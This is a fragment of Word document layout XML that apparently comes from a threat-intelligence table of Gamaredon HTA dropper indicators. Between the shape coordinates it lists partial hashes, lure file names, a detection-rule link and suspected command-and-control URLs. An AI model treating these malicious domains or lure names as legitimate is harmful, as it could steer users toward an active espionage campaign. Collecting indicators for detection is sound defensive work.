            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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MzsUrl-18-06/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5304446" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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0444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25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https://valhalla.nextron-systems.com/info/rule/MAL_APT_Gamaredon_HTA_Dropper_Dec25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46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48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5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53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0963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90564" cy="523874"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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523874">
                          <a:moveTo>
                            <a:pt x="3238499" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="52387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523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276349" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="52387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275715" y="52387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72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1515119</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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275715" y="1767204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="707389"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="707389"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1767204"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3238499" y="706754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="70675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706754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276349" y="706754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="70675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706754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="706754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="70675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70675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2222509</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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87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3282959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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294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4343409</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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601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5403859</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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49"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1060449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08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6464309</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1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7524759</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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4">
                          <a:moveTo>
                            <a:pt x="0" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="2120264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4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208" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2176779</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8585209</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4514215" cy="1059814"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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14215" cy="10598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14215" h="1059814">
                          <a:moveTo>
                            <a:pt x="1962149" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4514215" y="1059814"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4514215" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1962149" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1962149" y="1059814"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1961515" y="1059814"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1961515" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="105981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90564" cy="523874"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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523874">
                          <a:moveTo>
                            <a:pt x="3238499" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="52387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523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276349" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="52387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275715" y="52387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137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1515119</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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275715" y="1767204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="707389"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="707389"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1767204"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3238499" y="706754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="70675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706754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1276349" y="706754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3237864" y="70675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706754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="706754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="70675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70675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4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2222509</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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3282959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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059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4343409</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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366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5403859</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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49"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1060449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67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6464309</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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980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7524759</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="2120264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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4">
                          <a:moveTo>
                            <a:pt x="0" y="2120264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1275715" y="2120264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4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1856" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2176779</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8585209</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4514215" cy="1059814"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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14215" cy="10598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14215" h="1059814">
                          <a:moveTo>
                            <a:pt x="1962149" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4514215" y="1059814"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4514215" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1962149" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1962149" y="1059814"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1059814"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1961515" y="1059814"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1961515" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="105981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312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97550" cy="8661400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7550" cy="86614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7550" h="8661400">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="8661400"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="8658224"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5797550" y="8658224"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="7597775"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="7597775"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="6537325"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="6537325"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="5476874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="5476874"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4416425"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="4416425"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3355974"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="3355974"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2295524"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="2295524"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1235074"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="1235074"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="527685"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="527685"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="57975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4144" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2176779</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="8648700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6487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648700">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="86487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5168" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4138929</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>996959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="8648700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6487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648700">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="86487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6192" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6691630</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>990609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="8661400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6614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661400">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="86614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721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9264" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1178559</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1002053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="796173" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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1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0288" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5020310</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1088413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="827142" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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71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C2 contacté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1312" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2669540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1088413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1013084" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2336" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1275715</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1175408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="563668" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6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3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1520455</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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b0bc65c6e2c0d5c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38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1608720</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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tor_4_13_7-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40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1696985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1646154" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1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interference12443.dbk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4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1696985</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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19da79319be65bf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45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1785250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1550_18.06.2026.HTA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1873515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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dd70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5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2227845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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db604f5fe5a2890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52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2316110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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ScanDocuments_version_PD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15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2404375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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50db6449970a367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257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2492640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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F_AdobeReader_CreaterEdi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360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2492640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2335853" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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https://thepolicies.dpdns.org/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46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2580905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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0d75a5d8ec85a66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564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2669170</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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tor_5_12_4-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6672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2669170</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2335853" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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VoinUrl-18-06/pockets35447.j2k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76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2757435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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e26c8af19ccc6cf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2845700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1522_18.06.2026.HTA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97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2933965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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d8cc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07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3288295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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0338b8c8b25956c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79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3376560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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ScanDocuments_version_PD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281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3376560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="265639" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6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69"/>
                          </w:rPr>
                          <w:t xml:space="preserve">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384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3464825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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c134628bcc7350d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86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3553090</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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pravda.com.ua@thepolicies.dpdns.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88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3553090</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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F_AdobeReader_CreaterEdi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9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3641355</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6102ca88e7777b3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93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3729620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1569459" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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45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org/GpArj-17-06/hug/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3729620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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tor_3_18_7-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9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3817885</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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ca429cbd6ec8879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00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3906150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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course14509.bv1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203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3906150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1505_17.06.2026.HTA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30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3994415</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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4f95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40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4348745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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15c145c42ff9253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510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4437010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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ScanDocuments_version_PD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61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4525275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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81cb147a146c895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715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4613540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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F_AdobeReader_CreaterEdi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817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4613540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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https://apisinfo.qzz.io/Army-23-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4701805</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7cff2dc96f27874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022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4790070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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tor_3_14_6-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124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4790070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1646154" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1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06/excitement4697.fes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22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4878335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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252afa3b5e9838f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329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4966600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1677_23.06.2026.HTA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3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5054865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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9805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3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5409195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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8981723a6eaee69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36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5497460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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ScanDocuments_version_PD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392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5585725</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2335853" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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https://thepolicies.dpdns.org/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4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5585725</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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e4b042e98cea835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5673990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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F_AdobeReader_CreaterEdi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4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5762255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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fd166c9c5fa55b7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48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5762255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1569459" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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45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AkadUrl-17-06/frame/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51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5850520</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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tor_3_13_2-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53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5938785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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delicacy2390.idb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5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5938785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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56d85ea4a43964d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58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6027050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1081_17.06.2026.HTA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6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6115315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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e4bb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6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6469645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6dfde3daa38c0bd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65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6557910</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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ScanDocuments_version_PD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6646175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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https://getzone.qzz.io/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7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6646175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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21c12f0452f7433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72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6734440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1876240" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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F_AdobeReader_CreaterEdi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7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6822705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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b1cd8a1c5cd075b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77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6822705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1646154" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1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MouUkr-16-06/eagerly/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80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6910970</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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tor_4_16_3-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8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6999235</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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54e79f705609e31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84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6999235</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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germ29883.neta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87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7087500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5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1020_16.06.2026.HTA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8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7175765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342334" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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92d4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7530095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2ed97cc3d7d6eb7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94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7618360</wp:posOffset>
            </wp:positionV>
